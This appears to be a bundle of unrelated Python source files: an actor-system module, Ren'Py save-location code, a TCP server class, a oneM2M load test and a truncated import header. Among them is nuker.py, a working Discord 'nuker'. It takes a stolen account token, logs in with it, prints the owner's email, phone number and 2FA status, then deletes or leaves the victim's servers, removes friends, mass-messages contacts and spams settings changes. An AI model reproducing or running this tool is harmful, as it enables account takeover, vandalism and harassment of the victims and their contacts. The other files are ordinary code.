args = data.get('args', self._EMPTY_ARGS)
kwargs = data.get('kwargs', self._EMPTY_KWARGS)
return_data = method(*args, **kwargs)
# Send a message with returned otherwise if requested
if msg.sender and data.get('return', True):
return_msg = Message(
return_data,
sender=self.name,
receiver=msg.sender,
kind=MessageKind.RETURN,
prev_id=msg.id)
self.send(return_msg)
def send(self, *msgs: Any) -> NoReturn:
"""Sends messages to other actors."""
for m in msgs:
self.outbox[m.receiver].put(m, block=True)
def handle_return(self, msg: Message) -> NoReturn:
"""Handle RETURN Message."""
pass
def handle_ack(self, msg: Message) -> NoReturn:
"""Handle ACK Message."""
pass
def handle_set(self, msg: Message) -> NoReturn:
"""Handle SET Message."""
data = msg.data
self.attrs[data['name']] = data['value']
def should_ignore(self, msg: Message) -> bool:
"""Returns True if the actor should ignore the received message."""
return False
class BaseActorSystem(BaseActor, ABC):
"""The root-level actor that manages a collection of actors.
Attributes:
actors: A sequence of actors that the system manages.
"""
__slots__ = ('actors', '_actors')
def __init__(
self,
name: Optional[Hashable] = None,
inbox: Optional[Any] = None):
super().__init__(name, inbox)
self.actors: MutableSequence[BaseActor] = []
self._actors: MutableMapping[Hashable, Process] = {}
def connect(self, *actors: 'BaseActor', complete: bool = True) -> NoReturn:
"""Fully connects all actors to each other and the system."""
super().connect(*actors)
self.actors.extend(actors)
self._actors.update((a.name, Process(target=a.run)) for a in actors)
for a in actors:
a.connect(self)
if complete:
self._make_complete(*actors)
@staticmethod
def _make_complete(*actors: 'BaseActor') -> NoReturn:
for a1, a2 in itertools.combinations(actors, r=2):
a1.connect(a2)
a2.connect(a1)
def run(self) -> NoReturn:
"""Initiates all actor processes and waits for their termination."""
for a in self._actors.values():
a.start()
super().run()
for a in self._actors.values():
a.join()
def on_next(self, msg: Any) -> NoReturn:
# No-op
pass
def should_stop(self) -> bool:
# No-op
return True
class MessageActorSystem(MessageActor, ABC):
"""An actor system that runs as a MessageActor."""
__slots__ = ('actors', '_actors')
def __init__(
self,
name: Optional[Hashable] = None):
super().__init__(name)
self.actors: MutableSequence[BaseActor] = []
self._actors: MutableMapping[Hashable, Process] = {}
def connect(self, *actors: 'MessageActor', complete: bool = True) -> NoReturn:
"""Fully connects all actors to each other and the system."""
super().connect(*actors)
self.actors.extend(actors)
self._actors.update((a.name, Process(target=a.run)) for a in actors)
for a in actors:
a.connect(self)
if complete:
self._make_complete(*actors)
@staticmethod
def _make_complete(*actors: 'MessageActor') -> NoReturn:
for a1, a2 in itertools.combinations(actors, r=2):
a1.connect(a2)
a2.connect(a1)
def run(self) -> NoReturn:
"""Initiates all actor processes and waits for their termination."""
for a in self._actors.values():
a.start()
super().run()
for a in self._actors.values():
a.join()
def on_next(self, msg: Any) -> NoReturn:
# No-op
pass
def should_stop(self) -> bool:
# No-op
return True
|
savelocation.py
|
# Copyright 2004-2018 Tom Rothamel <pytom@bishoujo.us>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# This contains code for different save locations. A save location is a place
# where we store save data, and can retrieve it from.
#
# The current save location is stored in the location variable in loadsave.py.
from __future__ import print_function
import os
import zipfile
import json
import renpy.display
import threading
from renpy.loadsave import clear_slot, safe_rename
import shutil
disk_lock = threading.RLock()
# A suffix used to disambguate temporary files being written by multiple
# processes.
import time
tmp = "." + str(int(time.time())) + ".tmp"
class FileLocation(object):
"""
A location that saves files to a directory on disk.
"""
def __init__(self, directory):
self.directory = directory
# Make the save directory.
try:
os.makedirs(self.directory)
except:
pass
# Try to write a test file.
try:
fn = os.path.join(self.directory, "text.txt")
with open(fn, "w") as f:
f.write("Test.")
os.unlink(fn)
self.active = True
except:
self.active = False
# A map from slotname to the mtime of that slot.
self.mtimes = { }
# The persistent file.
self.persistent = os.path.join(self.directory, "persistent")
# The mtime of the persistent file.
self.persistent_mtime = 0
# The data loaded from the persistent file.
self.persistent_data = None
def filename(self, slotname):
"""
Given a slot name, returns a filename.
"""
return os.path.join(self.directory, renpy.exports.fsencode(slotname + renpy.savegame_suffix))
def scan(self):
"""
Scan for files that are added or removed.
"""
if not self.active:
return
with disk_lock:
old_mtimes = self.mtimes
new_mtimes = { }
suffix = renpy.savegame_suffix
suffix_len = len(suffix)
for fn in os.listdir(self.directory):
if not fn.endswith(suffix):
continue
slotname = fn[:-suffix_len]
try:
new_mtimes[slotname] = os.path.getmtime(os.path.join(self.directory, fn))
except:
pass
self.mtimes = new_mtimes
for slotname, mtime in new_mtimes.iteritems():
if old_mtimes.get(slotname, None) != mtime:
clear_slot(slotname)
for slotname in old_mtimes:
if slotname not in new_mtimes:
clear_slot(slotname)
for pfn in [ self.persistent + ".new", self.persistent ]:
if os.path.exists(pfn):
mtime = os.path.getmtime(pfn)
if mtime != self.persistent_mtime:
data = renpy.persistent.load(pfn)
if data is not None:
self.persistent_mtime = mtime
self.persistent_data = data
break
def save(self, slotname, record):
"""
Saves the save record in slotname.
"""
filename = self.filename(slotname)
with disk_lock:
record.write_file(filename)
self.scan()
def list(self):
"""
Returns a list of all slots with savefiles in them, in arbitrary
order.
"""
return list(self.mtimes)
def mtime(self, slotname):
"""
For a slot, returns the time the object was saved in that
slot.
Returns None if the slot is empty.
"""
return self.mtimes.get(slotname, None)
def json(self, slotname):
"""
Returns the JSON data for slotname.
Returns None if the slot is empty.
"""
with disk_lock:
try:
filename = self.filename(slotname)
zf = zipfile.ZipFile(filename, "r")
except:
return None
try:
try:
data = zf.read("json")
data = json.loads(data)
return data
except:
pass
try:
extra_info = zf.read("extra_info").decode("utf-8")
return { "_save_name" : extra_info }
except:
pass
return { }
finally:
zf.close()
def screenshot(self, slotname):
"""
Returns a displayable that show the screenshot for this slot.
Returns None if the slot is empty.
"""
with disk_lock:
mtime = self.mtime(slotname)
if mtime is None:
return None
try:
filename = self.filename(slotname)
zf = zipfile.ZipFile(filename, "r")
except:
return None
try:
png = False
zf.getinfo('screenshot.tga')
except:
png = True
zf.getinfo('screenshot.png')
zf.close()
if png:
screenshot = renpy.display.im.ZipFileImage(filename, "screenshot.png", mtime)
else:
screenshot = renpy.display.im.ZipFileImage(filename, "screenshot.tga", mtime)
return screenshot
def load(self, slotname):
"""
Returns the log component of the file found in `slotname`, so it
can be loaded.
"""
with disk_lock:
filename = self.filename(slotname)
zf = zipfile.ZipFile(filename, "r")
rv = zf.read("log")
zf.close()
return rv
def unlink(self, slotname):
"""
Deletes the file in slotname.
"""
with disk_lock:
filename = self.filename(slotname)
if os.path.exists(filename):
os.unlink(filename)
self.scan()
def rename(self, old, new):
"""
If old exists, renames it to new.
"""
with disk_lock:
old = self.filename(old)
new = self.filename(new)
if not os.path.exists(old):
return
if os.path.exists(new):
os.unlink(new)
os.rename(old, new)
self.scan()
def copy(self, old, new):
"""
Copies `old` to `new`, if `old` exists.
"""
with disk_lock:
old = self.filename(old)
new = self.filename(new)
if not os.path.exists(old):
return
shutil.copyfile(old, new)
self.scan()
def load_persistent(self):
"""
Returns a list of (mtime, persistent) tuples loaded from the
persistent file. This should return quickly, with the actual
load occuring in the scan thread.
"""
if self.persistent_data:
return [ (self.persistent_mtime, self.persistent_data) ]
else:
return [ ]
def save_persistent(self, data):
"""
Saves `data` as the persistent data. Data is a binary string giving
the persistent data in python format.
"""
with disk_lock:
if not self.active:
return
fn = self.persistent
fn_tmp = fn + tmp
fn_new = fn + ".new"
with open(fn_tmp, "wb") as f:
f.write(data)
safe_rename(fn_tmp, fn_new)
safe_rename(fn_new, fn)
def unlink_persistent(self):
if not self.active:
return
try:
os.unlink(self.persistent)
except:
pass
def __eq__(self, other):
if not isinstance(other, FileLocation):
return False
return self.directory == other.directory
class MultiLocation(object):
"""
A location that saves in multiple places. When loading or otherwise
accessing a file, it loads the newest file found for the given slotname.
"""
def __init__(self):
self.locations = [ ]
def active_locations(self):
return [ i for i in self.locations if i.active ]
def newest(self, slotname):
"""
Returns the location containing the slotname with the newest
mtime. Returns None of the slot is empty.
"""
mtime = -1
location = None
for l in self.locations:
if not l.active:
continue
slot_mtime = l.mtime(slotname)
if slot_mtime > mtime:
mtime = slot_mtime
location = l
return location
def add(self, location):
"""
Adds a new location.
"""
if location in self.locations:
return
self.locations.append(location)
def save(self, slotname, record):
saved = False
for l in self.active_locations():
l.save(slotname, record)
saved = True
if not saved:
raise Exception("Not saved - no valid save locations.")
def list(self):
rv = set()
for l in self.active_locations():
rv.update(l.list())
return list(rv)
def mtime(self, slotname):
l = self.newest(slotname)
if l is None:
return None
return l.mtime(slotname)
def json(self, slotname):
l = self.newest(slotname)
if l is None:
return None
return l.json(slotname)
def screenshot(self, slotname):
l = self.newest(slotname)
if l is None:
return None
return l.screenshot(slotname)
def load(self, slotname):
l = self.newest(slotname)
return l.load(slotname)
def unlink(self, slotname):
for l in self.active_locations():
l.unlink(slotname)
def rename(self, old, new):
for l in self.active_locations():
l.rename(old, new)
def copy(self, old, new):
for l in self.active_locations():
l.copy(old, new)
def load_persistent(self):
rv = [ ]
for l in self.active_locations():
rv.extend(l.load_persistent())
return rv
def save_persistent(self, data):
for l in self.active_locations():
l.save_persistent(data)
def unlink_persistent(self):
for l in self.active_locations():
l.unlink_persistent()
def scan(self):
# This should scan everything, as a scan can help decide if a
# location should become active or inactive.
for l in self.locations:
l.scan()
def __eq__(self, other):
if not isinstance(other, MultiLocation):
return False
return self.locations == other.locations
# The thread that scans locations every few seconds.
scan_thread = None
# True if we should quit the scan thread.
quit_scan_thread = False
# The condition we wait on.
scan_thread_condition = threading.Condition()
def run_scan_thread():
global quit_scan_thread
quit_scan_thread = False
while not quit_scan_thread:
try:
renpy.loadsave.location.scan() # @UndefinedVariable
except:
pass
with scan_thread_condition:
scan_thread_condition.wait(5.0)
def quit(): # @ReservedAssignment
global quit_scan_thread
with scan_thread_condition:
quit_scan_thread = True
scan_thread_condition.notifyAll()
scan_thread.join()
def init():
global scan_thread
location = MultiLocation()
# 1. User savedir.
location.add(FileLocation(renpy.config.savedir))
# 2. Game-local savedir.
if (not renpy.mobile) and (not renpy.macapp):
path = os.path.join(renpy.config.gamedir, "saves")
location.add(FileLocation(path))
# Scan the location once.
location.scan()
renpy.loadsave.location = location
scan_thread = threading.Thread(target=run_scan_thread)
scan_thread.start()
|
nuker.py
|
### Made by: Azael
### Tweaked by: Vexvain
import threading, requests, discord, random, time, os
from colorama import Fore, init
from selenium import webdriver
from datetime import datetime
from itertools import cycle
init(convert=True)
guildsIds = []
friendsIds = []
channelIds = []
clear = lambda: os.system('cls')
clear()
class Login(discord.Client):
async def on_connect(self):
for g in self.guilds:
guildsIds.append(g.id)
for f in self.user.friends:
friendsIds.append(f.id)
for c in self.private_channels:
channelIds.append(c.id)
await self.logout()
def run(self, token):
try:
super().run(token, bot=False)
except Exception as e:
print(f"[{Fore.RED}-{Fore.RESET}] Invalid token", e)
input("Press any key to exit..."); exit(0)
def tokenLogin(token):
opts = webdriver.ChromeOptions()
opts.add_experimental_option("detach", True)
driver = webdriver.Chrome('chromedriver.exe', options=opts)
script = """
function login(token) {
setInterval(() => {
document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage.token = `"${token}"`
}, 50);
setTimeout(() => {
location.reload();
}, 2500);
}
"""
driver.get("https://discord.com/login")
driver.execute_script(script + f'\nlogin("{token}")')
def tokenInfo(token):
headers = {'Authorization': token, 'Content-Type': 'application/json'}
r = requests.get('https://discord.com/api/v6/users/@me', headers=headers)
if r.status_code == 200:
userName = r.json()['username'] + '#' + r.json()['discriminator']
userID = r.json()['id']
phone = r.json()['phone']
email = r.json()['email']
mfa = r.json()['mfa_enabled']
print(f'''
[{Fore.RED}User ID{Fore.RESET}] {userID}
[{Fore.RED}User Name{Fore.RESET}] {userName}
[{Fore.RED}2 Factor{Fore.RESET}] {mfa}
[{Fore.RED}Email{Fore.RESET}] {email}
[{Fore.RED}Phone number{Fore.RESET}] {phone if phone else ""}
[{Fore.RED}Token{Fore.RESET}] {token}
''')
input()
def tokenFuck(token):
headers = {'Authorization': token}
gdel = input(f'Would you like to delete all guilds on this account. y/n [No Capitals] > ')
fdel = input('Would you like to remove all friends on this account. y/n [No Capitals] > ')
sendall = input('Would you like to send a dm to all recent dms on this account. y/n [No Capitals] > ')
fremove = input('Would you like to remove all recent dms on this account. y/n [No Capitals] > ')
gleave = input('Would you like to leave all guilds on this account. y/n [No Capitals] > ')
gcreate = input('Would you like to spam create guilds on this account. y/n [No Capitals] > ')
dlmode = input('Would you like to spam change through light and dark mode. y/n [No Capitals] > ')
langspam = input('Would you like to spam change the user\'s language. y/n [No Capitals] > ')
print(f"[{Fore.RED}+{Fore.RESET}] Nuking...")
if sendall == 'y':
try:
sendmessage = input('What do you wish to send in dms? > ')
for id in channelIds:
requests.post(f'https://discord.com/api/v8/channels/{id}/messages', headers=headers, data={"content": f"{sendmessage}"})
print(f'Sent message to private channel ID of {id}')
except Exception as e:
print(f'Error detected, ignoring. {e}')
if gleave == 'y':
try:
for guild in guildsIds:
requests.delete(f'https://discord.com/api/v8/users/@me/guilds/{guild}', headers=headers)
print(f'Left guild {guild}')
except Exception as e:
print(f'Error detected, ignoring. {e}')
if fdel == 'y':
try:
for friend in friendsIds:
requests.delete(f'https://discord.com/api/v8/users/@me/relationships/{friend}', headers=headers)
print(f'Removed friend {friend}')
except Exception as e:
print(f'Error detected, ignoring. {e}')
if fremove == 'y':
try:
for id in channelIds:
requests.delete(f'https://discord.com/api/v8/channels/{id}', headers=headers)
print(f'Removed private channel ID {id}')
except Exception as e:
print(f'Error detected, ignoring. {e}')
if gdel == 'y':
try:
for guild in guildsIds:
requests.delete(f'https://discord.com/api/v8/guilds/{guild}', headers=headers)
print(f'Deleted guild {guild}')
except Exception as e:
print(f'Error detected, ignoring. {e}')
if gcreate == 'y':
try:
gname = input('What would you like the spammed server name to be? > ')
gserv = input('How many servers would you like to make? [max is 100 by discord]')
for i in range(int(gserv)):
payload = {'name': f'{gname}', 'region': 'us central', 'icon': None, 'channels': None}
requests.post('https://discord.com/api/v6/guilds', headers=headers, json=payload)
print(f'Server {gname} made. Count: {i}')
except Exception as e:
print(f'Error detected, ignoring. {e}')
if dlmode == 'y':
try:
modes = cycle(["light", "dark"])
except Exception as e:
print(f'Error detected, ignoring. {e}')
if langspam == 'y':
try:
while True:
setting = {'theme': next(modes), 'locale': random.choice(['ja', 'zh-TW', 'ko', 'zh-CN', 'de', 'lt', 'lv', 'fi', 'se'])}
requests.patch("https://discord.com/api/v8/users/@me/settings", headers=headers, json=setting)
except Exception as e:
print(f'Error detected, ignoring. {e}')
time.sleep(9999)
def getBanner():
banner = f'''
[{Fore.RED}1{Fore.RESET}] Token bang the account
[{Fore.RED}2{Fore.RESET}] Grab the info of the account
[{Fore.RED}3{Fore.RESET}] Log into token
'''.replace('░', f'{Fore.RED}░{Fore.RESET}')
return banner
def startMenu():
print(getBanner())
print(f'[{Fore.RED}>{Fore.RESET}] Your choice', end=''); choice = str(input(' : '))
if choice == '1':
print(f'[{Fore.RED}>{Fore.RESET}] Account token', end=''); token = input(' : ')
print(f'[{Fore.RED}>{Fore.RESET}] Thread amount (number)', end=''); threads = input(' : ')
Login().run(token)
if threading.active_count() < int(threads):
t = threading.Thread(target=tokenFuck, args=(token, ))
t.start()
elif choice == '2':
print(f'[{Fore.RED}>{Fore.RESET}] Account token', end=''); token = input(' : ')
tokenInfo(token)
elif choice == '3':
print(f'[{Fore.RED}>{Fore.RESET}] Account token', end=''); token = input(' : ')
tokenLogin(token)
elif choice.isdigit() == False:
clear()
startMenu()
else:
clear()
startMenu()
if __name__ == '__main__':
startMenu()
|
TcpServer.py
|
#! /usr/bin/env python3
# -*- coding: UTF-8 -*-
import time
import traceback
import threading
import socket
from . import EventTypes, SocketError
import TcpClient
class TcpServer:
"""以 TCP 為連線基礎的 Socket Server
`host` : `tuple(ip, Port)` - 提供連線的 IPv4 位址與通訊埠號
"""
_host:tuple = None
_socket:socket.socket = None
_acceptThread:threading.Thread = None
_events:dict = {
EventTypes.STARTED: None,
EventTypes.STOPED: None,
EventTypes.CONNECTED: None,
EventTypes.DISCONNECT: None,
EventTypes.RECEIVED: None,
EventTypes.SENDED: None,
EventTypes.SENDFAIL: None
}
_stop:bool = False
_clients:dict = {}
_name:str = ''
def __init__(self, host:tuple):
self._host = host
self._name = '{}:{}'.format(*(host))
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Public Properties
@property
def host(self) -> tuple:
"""回傳本端提供連線的通訊埠號
回傳:
`tuple(ip, port)`
"""
return self._host
@property
def isAlive(self) -> bool:
"""取得伺服器是否處於等待連線中
回傳:
`True` / `False`
*True* : 等待連線中
*False* : 停止等待
"""
return self._acceptThread and self._acceptThread.isAlive()
@property
def clients(self) -> dict:
"""傳回已連接的連線資訊
回傳:
`dictionary{ tuple(ip, port) : <TcpClient>, ... }`
"""
return self._clients.copy()
# Public Methods
def start(self):
"""啟動 TcpServer 伺服器,開始等待遠端連線
引發錯誤:
`Exception` -- 回呼的錯誤函式
"""
try:
self._socket.bind(self._host)
except socket.error as ex:
if ex.errno == 48:
raise SocketError(1005)
else:
raise ex
self._socket.listen(5)
self._acceptThread = threading.Thread(target=self._accept_client)
self._acceptThread.setDaemon(True)
self._acceptThread.start()
now = time.time()
while not self._acceptThread.isAlive and (time.time() - now) <= 1:
time.sleep(0.1)
if self.isAlive and self._events[EventTypes.STARTED]:
self._events[EventTypes.STARTED](self)
def stop(self):
"""停止等待遠端連線
"""
self._stop = True
self.close()
self._socket.close()
self._socket = None
if self._acceptThread:
self._acceptThread.join(1.5)
def bind(self, key:str, evt=None):
"""綁定回呼(callback)函式
具名參數:
`key` `str` -- 回呼事件代碼;為避免錯誤,建議使用 *EventTypes* 列舉值
`evt` `def` -- 回呼(callback)函式
引發錯誤:
`KeyError` -- 回呼事件代碼錯誤
`TypeError` -- 型別錯誤,必須為可呼叫執行的函式
"""
if key not in self._events:
raise KeyError('key:\'{}\' not found!'.format(key))
if evt is not None and not callable(evt):
raise TypeError('evt:\'{}\' is not a function!'.format(evt))
self._events[key] = evt
def send(self, data, remote=None):
"""發送資料至遠端
傳入參數:
`data` `str` -- 欲傳送到遠端的資料
具名參數:
`remote` `tuple(ip, port)` -- 欲傳送的遠端連線;未傳入時,則發送給所有連線
引發錯誤:
`KeyError` -- 遠端連線不存在
`TypeError` -- 遠端連線不存在
`jfSocket.SocketError` -- 遠端連線已斷開
`Exception` -- 其他錯誤
"""
if remote:
if remote not in self._clients:
raise KeyError()
elif self._clients[remote] is None:
raise TypeError()
elif not self._clients[remote].isAlive:
raise SocketError(1001)
self._clients[remote].send(data)
else:
for x in self._clients:
self._clients[x].send(data)
def close(self, remote=None):
"""關閉遠端連線
具名參數:
`remote` `tuple(ip, port)` -- 欲關閉的遠端連線;未傳入時,則關閉所有連線
"""
if remote is not None:
if remote not in self._clients:
return
elif self._clients[remote] or not self._clients[remote].isAlive:
del self._clients[remote]
else:
self._clients[remote].close()
else:
for x in self._clients:
if self._clients[x]:
self._clients[x].close()
del self._clients[x]
# Private Methods
def _onClientDisconnect(self, *args):
if self._clients[args[2]]:
del self._clients[args[2]]
if self._events[EventTypes.DISCONNECT]:
self._events[EventTypes.DISCONNECT](*(args))
def _accept_client(self):
# 使用非阻塞方式等待連線,逾時時間為 1 秒
self._socket.settimeout(1)
while not self._stop:
try:
client, addr = self._socket.accept()
except socket.timeout:
# 等待連線逾時,再重新等待
continue
except:
# except (socket.error, IOError) as ex:
# 先攔截並顯示,待未來確定可能會發生的錯誤再進行處理
print(traceback.format_exc())
break
if self._stop:
try:
client.close()
except:
pass
break
clk = TcpClient.TcpClient(client)
clk.bind(key=EventTypes.RECEIVED, evt=self._events[EventTypes.RECEIVED])
clk.bind(key=EventTypes.DISCONNECT, evt=self._onClientDisconnect)
clk.bind(key=EventTypes.SENDED, evt=self._events[EventTypes.SENDED])
clk.bind(key=EventTypes.SENDFAIL, evt=self._events[EventTypes.SENDFAIL])
self._clients[addr] = clk
if self._events[EventTypes.CONNECTED] is not None:
self._events[EventTypes.CONNECTED](clk, self._host, addr)
if self._events[EventTypes.STOPED] is not None:
self._events[EventTypes.STOPED](self)
|
testLoad.py
|
#
# testLoad.py
#
# (c) 2020 by Andreas Kraft
# License: BSD 3-Clause License. See the LICENSE file for further details.
#
# Load tests
#
from __future__ import annotations
import unittest, sys, time
sys.path.append('../acme')
from typing import Tuple
import threading
from Constants import Constants as C
from Types import ResponseCode as RC, ResourceTypes as T
from init import *
class TestLoad(unittest.TestCase):
aes:list[Tuple[str, str]] = []
timeStart:float = 0
def __init__(self, methodName:str='runTest', count:int=None, parallel:int=1):
""" Pass a count to the test cases.
"""
super(TestLoad, self).__init__(methodName)
self.count = count
self.parallel = parallel
@classmethod
@unittest.skipIf(noCSE, 'No CSEBase')
def setUpClass(cls) -> None:
pass
@classmethod
@unittest.skipIf(noCSE, 'No CSEBase')
def tearDownClass(cls) -> None:
for ae in cls.aes:
DELETE(f'{cseURL}/{ae[1]}', ORIGINATOR)
@classmethod
@unittest.skipIf(noCSE, 'No CSEBase')
def startTimer(cls) -> None:
""" Start a timer.
"""
cls.timeStart = time.perf_counter()
@classmethod
@unittest.skipIf(noCSE, 'No CSEBase')
def stopTimer(cls, count:int, parallel:int=1) -> str:
""" Stop a timer and return a meaningful result string.
The count and parallel arguments must be given bc this is a class method that has no access to these instance attributes.
"""
timeEnd = time.perf_counter()
total = (timeEnd - cls.timeStart)
return f'{total:.4f} ({total/(count*parallel):.5f})'
def _createAEs(self, count:int) -> list[Tuple[str, str]]:
""" Create n AEs and return the list of (identifiers, resourceName).
"""
aes:list[Tuple[str, str]] = []
for _ in range(count):
dct = { 'm2m:ae' : {
'api': 'NMyApp1Id',
'rr': False,
'srv': [ '3' ]
}}
r, rsc = CREATE(cseURL, 'C', T.AE, dct)
self.assertEqual(rsc, RC.created)
ri = findXPath(r, 'm2m:ae/ri')
rn = findXPath(r, 'm2m:ae/rn')
aes.append((ri, rn))
self.assertEqual(len(aes), count)
return aes
def _deleteAEs(self, count:int, aes:list[Tuple[str, str]]=None) -> None:
""" Delete n AE's. Remove the AE's von the given list (only removed from the global list if no list was given).
"""
if aes is None:
aes = TestLoad.aes
self.assertEqual(len(aes), count)
for ae in list(aes):
_, rsc = DELETE(f'{cseURL}/{ae[1]}', ORIGINATOR)
self.assertEqual(rsc, RC.deleted)
aes.remove(ae)
self.assertEqual(len(aes), 0)
def _createCNTs(self, aern:str, originator:str, count:int, mni:int) -> list[Tuple[str, str]]:
""" Create n CNTs and return the list of (identifiers, resourceName).
"""
cnts:list[Tuple[str, str]] = []
for _ in range(count):
dct = { 'm2m:cnt' : {
'mni': mni
}}
r, rsc = CREATE(f'{cseURL}/{aern}', originator, T.CNT, dct)
self.assertEqual(rsc, RC.created)
ri = findXPath(r, 'm2m:cnt/ri')
rn = findXPath(r, 'm2m:cnt/rn')
cnts.append((ri, rn))
self.assertEqual(len(cnts), count)
return cnts
def _createCINs(self, aern:str, cntrn:str, originator:str, count:int) -> list[Tuple[str, str]]:
""" Create n CINs and return the list of (identifiers, resourceName).
"""
cins:list[Tuple[str, str]] = []
for _ in range(count):
dct = { 'm2m:cin' : {
'con': 'Hello, world'
}}
r, rsc = CREATE(f'{cseURL}/{aern}/{cntrn}', originator, T.CIN, dct)
self.assertEqual(rsc, RC.created)
ri = findXPath(r, 'm2m:cnt/ri')
rn = findXPath(r, 'm2m:cin/rn')
cins.append((ri, rn))
self.assertEqual(len(cins), count)
return cins
@unittest.skipIf(noCSE, 'No CSEBase')
def test_deleteAEs(self) -> None:
""" Delete n AEs. This might take a moment. """
TestLoad.startTimer()
print(f'{self.count} ... ', end='', flush=True)
self._deleteAEs(self.count)
print(f'{TestLoad.stopTimer(self.count)} ... ', end='', flush=True)
@unittest.skipIf(noCSE, 'No CSEBase')
def test_createAEs(self) -> None:
""" Create n AEs. This might take a moment. """
TestLoad.startTimer()
print(f'{self.count} ... ', end='', flush=True)
TestLoad.aes.extend(self._createAEs(self.count))
print(f'{TestLoad.stopTimer(self.count)} ... ', end='', flush=True)
@unittest.skipIf(noCSE, 'No CSEBase')
def test_createAEsParallel(self) -> None:
""" Create n AEs in m threads in parallel. This might take a moment. """
print(f'{self.count} * {self.parallel} Threads ... ', end='', flush=True)
threads = [threading.Thread(target=lambda: TestLoad.aes.extend(self._createAEs(self.count))) for _ in range(self.parallel)]
TestLoad.startTimer()
[t.start() for t in threads] # type: ignore [func-returns-value]
[t.join() for t in threads] # type: ignore [func-returns-value]
print(f'{TestLoad.stopTimer(self.count, self.parallel)} ... ', end='', flush=True)
@unittest.skipIf(noCSE, 'No CSEBase')
def test_deleteAEsParallel(self) -> None:
""" Delete n AEs in m threads in parallel. This might take a moment. """
print(f'{self.count} * {self.parallel} Threads ... ', end='', flush=True)
nrPerList = int(len(TestLoad.aes)/self.parallel)
deleteLists = [TestLoad.aes[x:x+nrPerList] for x in range(0, len(TestLoad.aes), nrPerList)]
threads = [threading.Thread(target=lambda n: self._deleteAEs(self.count, aes=deleteLists[n]), args=(n,)) for n in range(self.parallel)]
TestLoad.startTimer()
[t.start() for t in threads] # type: ignore [func-returns-value]
[t.join() for t in threads] # type: ignore [func-returns-value]
print(f'{TestLoad.stopTimer(self.count, self.parallel)} ... ', end='', flush=True)
TestLoad.aes.clear()
@unittest.skipIf(noCSE, 'No CSEBase')
def test_createCNTCINs(self) -> None:
""" Create 1 AE + n CNTs * 20 CINs. This might take a moment. """
self.assertEqual(len(TestLoad.aes), 0)
print(f'{self.count} ... ', end='', flush=True)
TestLoad.startTimer()
# create an AE
TestLoad.aes.extend(self._createAEs(1))
ae = TestLoad.aes[0]
# add self.count contaienrs
cnts = self._createCNTs(ae[1], ae[0], self.count, 10)
self.assertEqual(len(cnts), self.count)
# add 20 CIN to each container
for cnt in cnts:
self._createCINs(ae[1], cnt[1], ae[0], 20)
print(f'{TestLoad.stopTimer(self.count)} ... ', end='', flush=True)
@unittest.skipIf(noCSE, 'No CSEBase')
def test_deleteCNTCINs(self) -> None:
""" Delete 1 AE + n CNTs + 20 CINs. This might take a moment. """
self.assertEqual(len(TestLoad.aes), 1)
print(f'{self.count} ... ', end='', flush=True)
TestLoad.startTimer()
self._deleteAEs(1)
print(f'{TestLoad.stopTimer(1)} ... ', end='', flush=True)
# TODO: RETRIEVE CNT+CIN+la n times
# TODO: retrieve AEs
# TODO Discover AEs
# TODO discover CIN
# TODO CNT + CIN
# TODO CNT + CIN + SUB
def run(testVerbosity:int, testFailFast:bool) -> Tuple[int, int, int]:
suite = unittest.TestSuite()
suite.addTest(TestLoad('test_createAEs', 10))
suite.addTest(TestLoad('test_deleteAEs', 10))
suite.addTest(TestLoad('test_createAEs', 100))
suite.addTest(TestLoad('test_deleteAEs', 100))
suite.addTest(TestLoad('test_createAEsParallel', 10, 10))
suite.addTest(TestLoad('test_deleteAEsParallel', 10, 10))
suite.addTest(TestLoad('test_createAEs', 1000))
suite.addTest(TestLoad('test_deleteAEs', 1000))
suite.addTest(TestLoad('test_createAEsParallel', 100, 10))
suite.addTest(TestLoad('test_deleteAEsParallel', 100, 10))
suite.addTest(TestLoad('test_createAEsParallel', 10, 100))
suite.addTest(TestLoad('test_deleteAEsParallel', 10, 100))
suite.addTest(TestLoad('test_createCNTCINs', 10))
suite.addTest(TestLoad('test_deleteCNTCINs', 10))
suite.addTest(TestLoad('test_createCNTCINs', 100))
suite.addTest(TestLoad('test_deleteCNTCINs', 100))
result = unittest.TextTestRunner(verbosity=testVerbosity, failfast=testFailFast).run(suite)
printResult(result)
return result.testsRun, len(result.errors + result.failures), len(result.skipped)
if __name__ == '__main__':
_, errors, _ = run(2, True)
sys.exit(errors)
|
task.py
|
import atexit
import os
import signal
import sys
import threading
import time
from argparse import ArgumentParser
from tempfile import mkstemp
try:
# noinspection PyCompatibility
from collections.abc import Callable, Sequence as CollectionsSequence
except ImportError:
from collections import Callable, Sequence as CollectionsSequence
from typing import Optional, Union, Mapping, Sequence, Any, Dict, Iterable, TYPE_CHECKING
import psutil
import six
from pathlib2 import Path
from .backend_api.services import tasks, projects, queues
from .backend_api.session.session import Session, ENV_ACCESS_KEY, ENV_SECRET_KEY
from .backend_interface.metrics import Metrics
from .backend_interface.model import Model as BackendModel
from .backend_interface.task import Task as _Task
from .backend_interface.task.development.worker import DevWorker
from .backend_interface.task.repo import ScriptInfo
from .backend_interface.util import get_single_result, exact_match_regex, make_message, mutually_exclusive
from .binding.absl_bind import PatchAbsl
from .binding.artifacts import Artifacts, Artifact
from .binding.environ_bind import EnvironmentBind, PatchOsFork
from .binding.frameworks.pytorch_bind import PatchPyTorchModelIO
from .binding.frameworks.tensorflow_bind import TensorflowBinding
from .binding.frameworks.xgboost_bind import PatchXGBoostModelIO
from .binding.joblib_bind import PatchedJoblib
